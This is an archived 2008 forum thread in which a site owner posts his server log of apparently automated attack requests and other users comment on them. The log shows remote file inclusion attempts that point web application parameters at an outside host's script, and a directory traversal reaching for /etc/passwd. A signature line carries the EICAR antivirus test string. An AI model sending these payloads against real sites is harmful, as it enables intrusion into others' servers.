• Welcome to Valhalla Legends Archive.
 

Is somone trying to hax0r my site?

Started by Ringo, February 06, 2008, 12:22 AM

Previous topic - Next topic

iago

If you're playing around, don't forget encodings -- Unicode, UTF-8, invalid UTF-8, stuff like that.

I suggest writing an IsSubdirOf() function that makes sure you end up in the proper folder.
This'll make an interesting test for broken AV:
QuoteX5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*


Ringo

#16
lol, i think somone hates me :P

[02:23:49] Connection From 207.150.178.18:8769
[02:23:50] [Client 0] Querying: \index.php?
page=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?&

[02:24:00] [Client 0] Querying: \wp-content\plugins\pictpress\resize.php?
size=..\..\..\..\..\..\..\..\..\..\&path=\etc\passwd%00

[02:24:11] [Client 0] Querying: \tellmatic\include\Classes.inc.php?
tm_includepath=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?&

[02:24:22] [Client 0] Querying: \includes\functions_mod_user.php?
phpbb_root_path=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?&

[02:24:33] [Client 0] Querying: \wp-content\plugins\BackUp\Archive\Predicate.php?
bkpwp_plugin_path=

[02:24:44] [Client 0] Querying: \classes\core\language.php?
rootdir=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?&

[02:24:55] [Client 0] Querying: \components\com_smf\smf.php?
mosConfig_absolute_path=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?&

[02:25:06] [Client 0] Querying: \vbgsitemap\vbgsitemap-config.php?
base=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?&

[02:25:17] [Client 0] Querying: \public_html\modules\Forums\favorites.php?
nuke_bb_root_path=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?&

Explicit

Trying to traverse your directories... lol.
I'm awake in the infinite cold.

[13:41:45]<@Fapiko> Why is TehUser asking for wang pictures?
[13:42:03]<@TehUser> I wasn't asking for wang pictures, I was looking at them.
[13:47:40]<@TehUser> Mine's fairly short.

iago

Yeah, I tend to see automated scans daily. I've just started to ignore them. :)
This'll make an interesting test for broken AV:
QuoteX5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*